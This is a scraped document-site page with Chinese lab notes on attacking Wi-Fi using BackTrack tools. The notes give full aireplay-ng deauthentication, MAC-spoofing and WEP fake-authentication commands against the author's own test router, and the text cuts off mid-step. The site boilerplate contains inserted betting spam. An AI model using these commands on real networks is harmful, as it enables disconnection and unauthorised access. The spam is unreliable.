BackTrack破解.docx

  1. 1、本文档共8页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
BackTrack破解

一:wireshark 使用方法查看Wlan管理帧 ? ? ????????????????????wlan.fc.type==0查看Wlan控制帧 ? ? ????????????????????wlan.fc.type==1查看Wlan数据帧 ? ????????????????????? wlan.fc.type==2查看特定bssid的非beacon帧 ? ?(wlan.bssid == ?B0:48:7A:1A:EB:D4) !(wlan.fc.type_subtype == 0x08)二:命令行连接网络方法:1:配置无线安全配置为不加密;2:连接命令:iwconfig wlan2 ?essid WlabLab3: ? DHCP: dhclient4: ? 查看命令:ifconfig wlan2?5:加密连接如果自动分配地址不成功,手动分配地址:ifconfig wlan2 ?192.168.1.11 netmask 255.255.255.0手动修改DNS:编辑/etc/resolv.conf文件设置DNS服务器地址nameserver ? 192.168.1.1三:隐藏SSID攻击方法:1:隐藏前可以用wireshark在Beacon frames包看见,及可以在网络连接看见。(3个截图)1) airodump-ng mon02) wireshark? ? 3) 网卡显示有其他网络出现2:去除路由器的广播SSID功能,步骤与图3:被动监听接收,等待该AP客户端的接入,? ? ? wlan.bssid == ?B0:48:7A:1A:EB:D4?4:主动应用下线攻击,迫使与该AP相连的用户下线,再连接。? ? ? 攻击命令:aireplay-ng -0 5 -a?B0:48:7A:1A:EB:D4 mon0? ? ? ? ? ? ? ? ? ? ? ? ?aireplay-ng --deauth 5 -a?B0:48:7A:1A:EB:D4 mon0? ? ? 如果不成功,根据提示修改网卡的工作频道:iwconfig mon0 channel 2? ? ? ?-0 ?选择Deauthentication attack ? ?5表示发5个包? ? ? ?-a ?目标的mac 地址5: ? 打开wireshark监听。? ? ? ?(wlan.bssid == ?B0:48:7A:1A:EB:D4) !(wlan.fc.type_subtype == 0x08)四:地址过滤攻击方法:1:配置无线安全配置为不加密; ? ? ? ?2:配置路由器地址过滤;3:测试不是绑定的IP是否能连接;? ? ? iwconfig wlan2 essid WlanLab4: ?监控与该路由器连接的客户端Mac地址? ? ?airodump-ng mon05:修改本地网卡的mac地址为绑定的Mac地址? ? ?ifconfig wlan2 down? ? ?macchange ?-m?48:5D:60:3B:7E:33 wlan2? ? ?ifconfig wlan2 up6: ?连接AP? ? ?连接:iwconfig wlan2 ?essid WlabLab? ? ?自动分配地址: dhclient7: ?测试是否能连接? ? ?iwconfig wlan2? ? ?ping 192.168.1.1五:共享密钥认证攻击方法原理:? ?? ? ? ?安全分析:攻击者可以被动的监听到传送明文及加密后的明文,可以通过异或运算出密码流,此密码流被用来加密任何由AP送来的验证明文,这样有了密码流就无需真正的密码。? ? ? ?攻击过程:? ? ? ?1:配置路由器为WEP共享密钥加密,密码为1111111111? ? ? ?2:监听客户端与AP连接时的密码流,如果长时间没有,可以应用deauthencation攻击迫使client下线。? ? ? ? ? ? ?airodump-ng mon0 ?-c 6 --bssid?B0:48:7A:1A:EB:D4 -w keystream;? ? ? ?3:查看keystream-01-B0-48-7A-1A-EB-D4.xor文件是否生成;? ? ? ?4:打开wireshark ,wlan.addr== aa:aa:aa:aa:aa:aa ,伪造共享认证,连接AP? ? ? ? ? ? aireplay-ng -1 0 -e WlavLab -y?keystream-01-B0-48-7A-1A-EB-D4.xor -a?B0:48:7A:1A:EB:D4 -h aa:aa:aa:aa:aa:aa? ? ? ?5: ?查看路由器主机状态;? ? ? ?6: ?查看捕获的包,检查认证成功与连接成

文档评论(0)

xcs88858 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8130065136000003

1亿VIP精品文档

相关文档